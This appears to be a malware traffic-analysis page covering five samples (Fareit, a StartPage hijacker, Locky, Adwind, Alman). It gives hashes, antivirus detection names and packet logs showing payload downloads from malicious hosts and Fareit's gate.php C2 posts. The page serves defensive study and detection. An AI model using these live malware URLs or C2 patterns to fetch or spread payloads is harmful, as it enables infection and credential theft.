Fareit/Symmi shit.exe Trojan Password Stealer Malware PCAP file download Traffic Analysis Sample

SHA256: 54c8ce7531f1b01dcda678c41fb14ffc5f223ff0427fc83de939d2286ad200f0
File name: shit.exe
Detection ratio: 39 / 56
Analysis date: 2016-10-31 02:32:28 UTC
AVG Crypt6.HNN 20161031
AVware Trojan.Win32.Generic!BT 20161031
Ad-Aware Gen:Variant.Symmi.68665 20161031
AhnLab-V3 Trojan/Win32.Fareit.N2141190184 20161030
Antiy-AVL Trojan[PSW]/Win32.Fareit 20161031
Arcabit Trojan.Symmi.D10C39 20161031
Avast Win32:Malware-gen 20161031
Avira (no cloud) TR/Agent.egpwh 20161030
BitDefender Gen:Variant.Symmi.68665 20161031
CAT-QuickHeal (Suspicious) – DNAScan 20161029
ClamAV Win.Trojan.Generic-3223 20161031
CrowdStrike Falcon (ML) malicious_confidence_82% (W) 20161024
DrWeb Trojan.PWS.Stealer.1932 20161031
ESET-NOD32 a variant of Win32/Kryptik.FIKV 20161030
Emsisoft Gen:Variant.Symmi.68665 (B) 20161031
F-Secure Gen:Variant.Symmi.68665 20161031
Fortinet W32/Fareit.CEIG!tr.pws 20161031
GData Gen:Variant.Symmi.68665 20161031
Ikarus Trojan.Win32.Crypt 20161030
Invincea virtool.win32.obfuscator.xy 20161018

2016-10-30 22:38:24.577664 IP 192.168.1.102.61884 > 85.143.222.24.80: Flags [P.], seq 0:315, ack 1, win 256, length 315: HTTP: GET /~kingskil/Prince/Man/lucy/mine/shit.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: kingskillz.ru
Connection: Keep-Alive

2016-10-30 22:38:24.754088 IP 192.168.1.102.61884 > 85.143.222.24.80: Flags [.], ack 2908, win 256, length 0
2016-10-30 22:38:46.639495 IP 192.168.1.102.61887 > 85.143.222.24.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0
Host: kingskillz.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 340
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)


2016-10-30 22:38:54.708909 IP 192.168.1.102.61888 > 85.143.222.24.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0
Host: kingskillz.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 340
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)


2016-10-30 22:39:02.332735 IP 192.168.1.102.61889 > 85.143.222.24.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0
Host: kingskillz.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 340
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Clickfraud Browser Hijacker fcssq.exe STARTPAGE Malware Trojan PCAP file download sample

SHA256: 5bfb7c23c0000a681f4c5d259754fd45b740128956a8eba0c0f18f68e73c0b8f
File name: fcssq.exe
Detection ratio: 27 / 56
Analysis date: 2016-10-31 02:08:15 UTC
AVG Startpage.XMP 20161031
AVware Trojan.Win32.Generic!BT 20161031
AegisLab Troj.Startpage.Gen!c 20161031
Avast Win32:Malware-gen 20161031
Avira (no cloud) TR/StartPage.663918 20161030
Comodo UnclassifiedMalware 20161031
DrWeb Trojan.DownLoader13.14385 20161031
ESET-NOD32 a variant of Win32/StartPage.NQH 20161030
Fortinet W32/StartPage.NQH!tr 20161031
GData Win32.Trojan.Agent.O9KH9R 20161031
Ikarus Trojan.Win32.StartPage 20161030
K7AntiVirus Trojan ( 004b9d361 ) 20161030
K7GW Trojan ( 004b9d361 ) 20161031
Kaspersky not-a-virus:AdWare.Win32.Amonetize.emdm 20161031
McAfee RDN/Generic.bfr 20161031
McAfee-GW-Edition RDN/Generic.bfr 20161031
NANO-Antivirus Trojan.Win32.DownLoader13.dujqej 20161031
Qihoo-360 Win32/Trojan.e26 20161031
Sophos Generic PUA AJ (PUA) 20161030
Tencent Win32.Trojan.Startpage.Eddi 20161031
TrendMicro TROJ_GEN.R02LC0FHN16 20161031

2016-10-30 21:59:34.586083 IP 192.168.1.102.61485 > 47.88.28.26.80: Flags [P.], seq 0:297, ack 1, win 256, length 297: HTTP: GET /soft/fcssq.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: down3.feiyang163.com
Connection: Keep-Alive

2016-10-30 21:59:34.689591 IP 192.168.1.102.61485 > 47.88.28.26.80: Flags [.], ack 2921, win 256, length 0
2016-10-30 21:59:46.257998 IP 192.168.1.102.61486 > 47.88.28.26.80: Flags [P.], seq 0:236, ack 1, win 256, length 236: HTTP: GET /ad/softad/popup.htm HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: adsvc1.unadnet.com.cn
Connection: Keep-Alive

2016-10-30 21:59:46.266779 IP 192.168.1.102.61487 > 47.88.28.26.80: Flags [.], ack 2994073208, win 256, length 0
2016-10-30 21:59:46.267231 IP 192.168.1.102.61487 > 47.88.28.26.80: Flags [P.], seq 0:237, ack 1, win 256, length 237: HTTP: GET /count/softcount/?pwc HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: adsvc1.unadnet.com.cn
Connection: Keep-Alive

2016-10-30 21:59:46.353528 IP 192.168.1.102.61486 > 47.88.28.26.80: Flags [P.], seq 236:474, ack 876, win 253, length 238: HTTP: GET /ad/softad/tuijian.htm HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: adsvc1.unadnet.com.cn
Connection: Keep-Alive

Locky Ransomware Malware aoteatrial.net/02yls0 PCAP file download traffic sample

SHA256: 9081ecf001a89fb1fa6f2855c6385d43fd473d69de0e58ed9b9e7e23ac954aff
File name: 02yls0
Detection ratio: 33 / 56
Analysis date: 2016-10-29 07:47:22 UTC
Arcabit Trojan.Agent.CAHB 20161029
Avast Win32:Malware-gen 20161029
Avira (no cloud) TR/Crypt.ZPACK.elnee 20161028
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9942 20161029
BitDefender Trojan.Agent.CAHB 20161029
Bkav HW32.Packed.AE7D 20161029
CrowdStrike Falcon (ML) malicious_confidence_100% (D) 20161024
Cyren W32/Locky.BC.gen!Eldorado 20161029
ESET-NOD32 a variant of Win32/Kryptik.FIQB 20161029
Emsisoft Trojan.Agent.CAHB (B) 20161029
F-Prot W32/Locky.BC.gen!Eldorado 20161029
F-Secure Trojan.Agent.CAHB 20161029
Fortinet W32/Generic.FIQB!tr 20161029
GData Trojan.Agent.CAHB 20161029
Invincea ransom.win32.locky.a 20161018
K7AntiVirus Trojan ( 004fbad41 ) 20161029
K7GW Trojan ( 004fbad41 ) 20161029
Kaspersky HEUR:Trojan.Win32.Generic 20161029
Malwarebytes Ransom.Locky 20161029

2016-10-29 02:50:44.243416 IP 192.168.1.102.64953 > 213.176.241.230.80: Flags [P.], seq 0:283, ack 1, win 256, length 283: HTTP: GET /02yls0 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: aoteatrial.net
Connection: Keep-Alive
2016-10-29 02:50:45.116064 IP 192.168.1.102.64953 > 213.176.241.230.80: Flags [.], ack 2921, win 256, length 0
2016-10-29 02:50:52.686092 IP 192.168.1.102.64954 > 104.112.255.83.80: Flags [P.], seq 0:262, ack 1, win 256, length 262: HTTP: GET /fwlink/?LinkId=57426&Mime=application/x-msdownload HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: go.microsoft.com
Connection: Keep-Alive
2016-10-29 02:50:52.765557 IP 192.168.1.102.64953 > 213.176.241.230.80: Flags [.], ack 247008, win 252, length 0
2016-10-29 02:50:57.973364 IP 192.168.1.102.64957 > 213.176.241.230.80: Flags [P.], seq 0:392, ack 1, win 256, length 392: HTTP: GET /02yls0 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Range: bytes=245702-
Unless-Modified-Since: Fri, 28 Oct 2016 07:32:48 GMT
If-Range: "3c400-53fe7dd719b7b"
Host: aoteatrial.net
Connection: Keep-Alive


2016-10-29 02:51:33.922947 IP 192.168.1.102.64957 > 213.176.241.230.80: Flags [P.], seq 392:675, ack 1360, win 251, length 283: HTTP: GET /142y5x HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: aoteatrial.net
Connection: Keep-Alive

Western Union Statement Malspam Adwind Malware Trojan PCAP file download traffic sample

SHA256: 51d0f63e2d215ab1e4240468b8a518412472dc90ed24fffb8e5cf1e7aa75ede2
File name: Western_Union_Agent_Statement_and_summary_pdf.jar
Detection ratio: 19 / 55
Analysis date: 2016-10-29 07:42:32 UTC
ALYac Trojan.Java.Adwind 20161029
AVware Trojan.Java.Generic.a (v) 20161029
AegisLab Troj.Java.Agent!c 20161029
AhnLab-V3 HEUR/Jarex 20161028
Avast Java:Adwind-G [Trj] 20161029
ClamAV Java.Malware.Agent-1803486 20161029
DrWeb Java.Adwind.179 20161029
ESET-NOD32 a variant of Java/Adwind.AAJ 20161029
GData Java.Trojan.Agent.PLRUTU 20161029
Ikarus Trojan.Java.Adwind 20161028
Kaspersky HEUR:Trojan.Java.Agent.gen 20161029
McAfee Adwind!jar 20161029
McAfee-GW-Edition Artemis!Trojan 20161029
Sophos Java/Adwind-IV 20161029
Symantec Trojan.Maljava 20161029
TrendMicro JAVA_ADWIND.JCC 20161029
TrendMicro-HouseCall JAVA_ADWIND.JCC 20161029
VIPRE Trojan.Java.Generic.a (v) 20161029
ViRobot JAVA.S.Adwind.232864[h]

What is Adwind?

Adwind RAT is a cross-platform, multifunctional malware program, also known as AlienSpy, Frutas, Unrecom, Sockrat, JSocket and jRat, that is distributed through a single malware-as-a-service platform. One of the main features that distinguishes Adwind RAT from other commercial malware is that it is distributed openly in the form of a paid service, where the "customer" pays a fee in return for use of the malicious program. There were around 1,800 users of the system by the end of 2015, which makes it one of the biggest malware platforms in existence today.

What can it do?

The malware’s list of functions includes the ability to:

  • collect keystrokes
  • steal cached passwords and grab data from web forms
  • take screenshots
  • take pictures and record video from a webcam
  • record sound from a microphone
  • transfer files
  • collect general system and user information
  • steal keys for cryptocurrency wallets
  • manage SMS (for Android)
  • steal VPN certificates

2016-10-29 01:33:10.718213 IP 192.168.1.102.64306 > 209.140.29.13.80: Flags [P.], seq 0:330, ack 1, win 256, length 330: HTTP: GET /host/Western_Union_Agent_Statement_and_summary_pdf.jar HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: linamhost.com
Connection: Keep-Alive
2016-10-29 01:33:10.757538 IP 192.168.1.102.64306 > 209.140.29.13.80: Flags [.], ack 2921, win 256, length 0
2016-10-29 01:33:18.611584 IP 192.168.1.102.64307 > 5.135.104.98.80: Flags [P.], seq 0:299, ack 1, win 256, length 299: HTTP: GET /Notifier/?language=English&source=RARLAB&landingpage=firstexpired&version=511&architecture=32 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: rarlab.com
Connection: Keep-Alive
2016-10-29 01:33:18.731444 IP 192.168.1.102.64307 > 5.135.104.98.80: Flags [.], ack 2890, win 256, length 0
2016-10-29 01:33:18.782329 IP 192.168.1.102.64307 > 5.135.104.98.80: Flags [P.], seq 299:658, ack 3393, win 254, length 359: HTTP: GET /Notifier/css/basic.css?20160912 HTTP/1.1
Accept: */*
Referer: http://rarlab.com/Notifier/?language=English&source=RARLAB&landingpage=firstexpired&version=511&architecture=32
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: rarlab.com
Connection: Keep-Alive
2016-10-29 01:33:18.784392 IP 192.168.1.102.64308 > 5.135.104.98.80: Flags [S], seq 3160342502, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

2016-10-29 01:33:18.893281 IP 192.168.1.102.64307 > 5.135.104.98.80: Flags [P.], seq 658:1031, ack 5180, win 256, length 373: HTTP: GET /Notifier/css/default_css_rrlb_en.css?20160912 HTTP/1.1
Accept: */*
Referer: http://rarlab.com/Notifier/?language=English&source=RARLAB&landingpage=firstexpired&version=511&architecture=32
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: rarlab.com
Connection: Keep-Alive

css.jipinfeiche.cn Alman Trojan Malware PCAP file download traffic sample installad_304.dat c2

SHA256: a3b7e3fd4c709cc40be1b7114b109bc16228374f31f692311348abf2ea4d09b8
File name: fcjingdianyouxihejizhongwenban.exe
Detection ratio: 31 / 48
Analysis date: 2016-10-29 07:26:36 UTC
ESET-NOD32 Win32/Alman.NAB 20161029
Emsisoft Worm.Generic.532532 (B) 20161029
F-Secure Worm.Generic.532532 20161029
GData Worm.Generic.532532 20161029
Ikarus Virus.Win32.Alman 20161028
Invincea virus.win32.ramnit.a 20161018
Jiangmin Win32/Almana.c 20161029
Kaspersky Virus.Win32.Alman.b 20161029
Malwarebytes Trojan.ChinAd 20161029
McAfee-GW-Edition Artemis 20161029
eScan Worm.Generic.532532 20161029
NANO-Antivirus Virus.Win32.Alman.xyevp 20161029
Panda Generic Suspicious 20161028
Qihoo-360 Win32/Trojan.323 20161029
Sophos Mal/Generic-S 20161029
Symantec Heur.AdvML.B 20161029
Tencent Win32.Virus.Alman.Ahem 20161029
TheHacker Trojan/.Agent.bt 20161028
VBA32 Virus.Win32.Alman.B 20161028
Zoner Win32.Alman.NAB 20161029

2016-10-29 01:50:41.235203 IP 192.168.1.102.64692 > 218.77.77.34.80: Flags [P.], seq 0:316, ack 1, win 256, length 316: HTTP: GET /fcjingdianyouxihejizhongwenban.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: down7.downyouxi.com
Connection: Keep-Alive

2016-10-29 01:50:41.536118 IP 192.168.1.102.64692 > 218.77.77.34.80: Flags [.], ack 2921, win 256, length 0
2016-10-29 01:54:47.322248 IP 192.168.1.102.64712 > 104.95.25.151.80: Flags [P.], seq 0:214, ack 1, win 256, length 214: HTTP: GET /Market.svc/AppTileV3?symbols=29.10.%40CCO.29.COMP&contentType=0&tileType=0&locale=EN-US&symbolTypes=I HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WNS/10.0
Host: finance.services.appex.bing.com

2016-10-29 01:54:47.355866 IP 192.168.1.102.64714 > 104.95.25.151.80: Flags [.], ack 3234256246, win 256, length 0
2016-10-29 01:54:47.355886 IP 192.168.1.102.64713 > 104.95.25.151.80: Flags [.], ack 3299911539, win 256, length 0
2016-10-29 01:54:47.355890 IP 192.168.1.102.64715 > 23.34.0.76.80: Flags [.], ack 2971165570, win 256, length 0
2016-10-29 01:54:47.356814 IP 192.168.1.102.64714 > 104.95.25.151.80: Flags [P.], seq 0:217, ack 1, win 256, length 217: HTTP: GET /Market.svc/AppTileV3?symbols=30.10.%21DJI.30.%24INDU&contentType=0&tileType=0&locale=EN-US&symbolTypes=I HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WNS/10.0
Host: finance.services.appex.bing.com

2016-10-29 02:12:07.225822 IP 192.168.1.102.64792 > 120.132.92.122.80: Flags [P.], seq 0:206, ack 1, win 259, length 206: HTTP: GET /advert/get.php?type=1&name=FC%C2%BE%C2%AD%C2%B5%C3%A4%C3%93%C3%8E%C3%8F%C2%B7%C2%BA%C3%8F%C2%BC%C2%AF+%C3%96%C3%90%C3%8E%C3%84%C2%B0%C3%A6&site=1 HTTP/1.1
Host: www.qq5.com
Connection: Keep-Alive

2016-10-29 02:12:07.541884 IP 192.168.1.102.64792 > 120.132.92.122.80: Flags [.], ack 518, win 257, length 0
2016-10-29 02:12:08.022699 IP 192.168.1.102.63007 > 75.75.75.75.53: 24044+ A? css.jipinfeiche.cn. (36)
2016-10-29 02:12:09.030304 IP 192.168.1.102.63008 > 75.75.75.75.53: 24044+ A? css.jipinfeiche.cn. (36)

2016-10-29 02:12:10.718966 IP 192.168.1.102.64793 > 183.61.19.211.80: Flags [P.], seq 0:213, ack 1, win 256, length 213: HTTP: GET /advert/get.php?type=1&name=FC%C2%BE%C2%AD%C2%B5%C3%A4%C3%93%C3%8E%C3%8F%C2%B7%C2%BA%C3%8F%C2%BC%C2%AF+%C3%96%C3%90%C3%8E%C3%84%C2%B0%C3%A6&site=1 HTTP/1.1
Host: css.jipinfeiche.cn
Connection: Keep-Alive

2016-10-29 02:12:10.964277 IP 192.168.1.102.64792 > 120.132.92.122.80: Flags [P.], seq 206:320, ack 518, win 257, length 114: HTTP: GET /advert/manage/runtime/dat/installad/installad_304.dat HTTP/1.1
Host: www.qq5.com
Connection: Keep-Alive

2016-10-29 02:12:11.020155 IP 192.168.1.102.64793 > 183.61.19.211.80: Flags [.], ack 547, win 254, length 0
2016-10-29 02:12:11.035916 IP 192.168.1.102.63008 > 75.75.76.76.53: 24044+ A? css.jipinfeiche.cn. (36)
2016-10-29 02:12:11.216819 IP 192.168.1.102.64793 > 183.61.19.211.80: Flags [P.], seq 213:334, ack 547, win 254, length 121: HTTP: GET /advert/manage/runtime/dat/installad/installad_304.dat HTTP/1.1
Host: css.jipinfeiche.cn
Connection: Keep-Alive